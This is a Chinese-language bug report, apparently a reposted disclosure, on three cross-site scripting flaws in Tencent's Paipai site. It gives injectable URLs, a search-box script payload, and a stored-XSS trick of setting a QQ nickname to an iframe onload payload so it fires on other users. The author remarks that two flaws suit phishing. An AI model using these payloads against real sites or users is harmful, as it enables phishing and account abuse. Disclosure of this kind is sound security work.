3处xss,两处钓鱼好,还一处耍着玩! http://sse1.paipai测试数据/s-hl1w6sgwpq3jv6gxk3tz23ovrtxc835spuv1h25mi6xw2o5wpq3jv6gxk2--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2. html http://shop.paipai测试数据/5565117/0-0000000000-0-1-1-0-3-0-0-0/Ii8+PC9zY3JpcHQ+PHNjcmlwdD5hbGVydCgvZ29kZXJjaS8pPC9zY3JpcHQ+Xi0xXi0x/index.shtml 这两处钓鱼比较隐蔽!很给力! http://bbs.paipai测试数据/portal.php?byref=1&g_tk=1772478199&g_ty=lk&byref=1 这一处耍着玩比较好!具体利用有待研究! 这个我是进拍拍首页的时候,习惯性的在搜索框输入一个"/><script>alert(/goderci/)</script>,结果我承认我受精了!因为受精了,所以决定多喵几眼! http://sse1.paipai测试数据/s-hl1w6sgwpq3jv6gxk3tz23ovrtxc835spuv1h25mi6xw2o5wpq3jv6gxk2--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2.html http://shop.paipai测试数据/5565117/0-0000000000-0-1-1-0-3-0-0-0/Ii8+PC9zY3JpcHQ+PHNjcmlwdD5hbGVydCgvZ29kZXJjaS8pPC9zY3JpcHQ+Xi0xXi0x/index.shtml 细说一下这个,很蛋疼的! 是因为qq很多业务都会调用用户的昵称,所以大家以后都把昵称改为<iframe onload=alert(1)>字数不多不少,刚刚好啊!改完以后去体验qq的业务,包你走到哪弹到哪! HdhCmsTest2cto测试数据 像我这么2的人,一般碰到这种情况,直接去bbs发个帖,发个心情什么的。然后想弹别人的时候就把昵称改一改! 嗯,就这样,观众朋友们!明晚继续! 修复方案: 加强过滤 作者 goderci
查看更多关于腾讯拍拍网多处xss及修复 - 网站安全 - 自学php的详细内容...